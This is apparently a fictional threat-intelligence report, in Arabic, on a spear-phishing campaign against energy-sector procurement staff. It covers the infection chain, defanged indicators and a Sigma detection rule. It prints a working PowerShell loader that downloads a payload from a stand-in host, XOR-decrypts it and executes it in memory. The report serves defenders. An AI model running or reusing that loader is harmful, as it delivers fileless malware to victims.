رصد فريق سيبرانا (في هذا السيناريو التجريبي) حملة تصيّد موجّهة تستهدف موظفي المشتريات والعقود في شركات الطاقة بالمنطقة. تصل الرسائل من نطاقات مسجّلة حديثًا تحاكي أسماء جهات حكومية، وتحمل عنوانًا من قبيل «دعوة لتقديم عرض — مشروع توسعة».
سلسلة الإصابة
- رسالة بريد تحمل ملفًا مضغوطًا محميًا بكلمة مرور مذكورة في نص الرسالة (لتجاوز الفحص على البوابة).
- داخل الملف اختصار
.lnkبأيقونة PDF يشغّل PowerShell بوسيطات مخفية. - السكربت ينزّل حمولة مشفّرة من خادم يحاكي خدمة مشاركة ملفات، ويفكّ تشفيرها في الذاكرة.
- تُحقن أداة الوصول عن بُعد في عملية شرعية وتحقق الاستمرارية عبر مهمة مجدولة.
السكربت الأولي (مبسّط)
$u = "https://files-share.example.net/t/" + $env:COMPUTERNAME
$b = (New-Object Net.WebClient).DownloadData($u)
$k = [Text.Encoding]::ASCII.GetBytes("d3m0-k3y")
$d = 0..($b.Length-1) | % { $b[$_] -bxor $k[$_ % $k.Length] }
[Reflection.Assembly]::Load([byte[]]$d).EntryPoint.Invoke($null, $null)لاحظ استخدام اسم الجهاز في المسار: يسمح ذلك للمهاجم بتقديم حمولة مختلفة لكل ضحية أو حجبها عن بيئات التحليل.
مؤشرات الاختراق
| domain | files-share[.]example[.]net | خادم توزيع الحمولة |
| domain | tenders-portal[.]example[.]org | نطاق إرسال رسائل التصيّد |
| ipv4 | 198[.]51[.]100[.]23 | خادم القيادة والتحكم |
| sha256 | a94f2c8e1b3d5f7a9c0e2b4d6f8a1c3e5b7d9f0a2c4e6b8d0f1a3c5e7b9d2f4a | ملف الاختصار |
| sha256 | c17e3a9b5d2f8c4e6a0b1d3f5a7c9e2b4d6f8a0c1e3b5d7f9a2c4e6b8d0f3a5c | الحمولة بعد فك التشفير |
الروابط والعناوين معطَّلة (defanged) للحماية
قاعدة كشف مقترحة
title: LNK spawning PowerShell with hidden window and download
logsource:
product: windows
category: process_creation
detection:
selection:
ParentImage|endswith: '\\explorer.exe'
Image|endswith: '\\powershell.exe'
CommandLine|contains|all:
- '-w hidden'
- 'DownloadData'
condition: selection
level: high




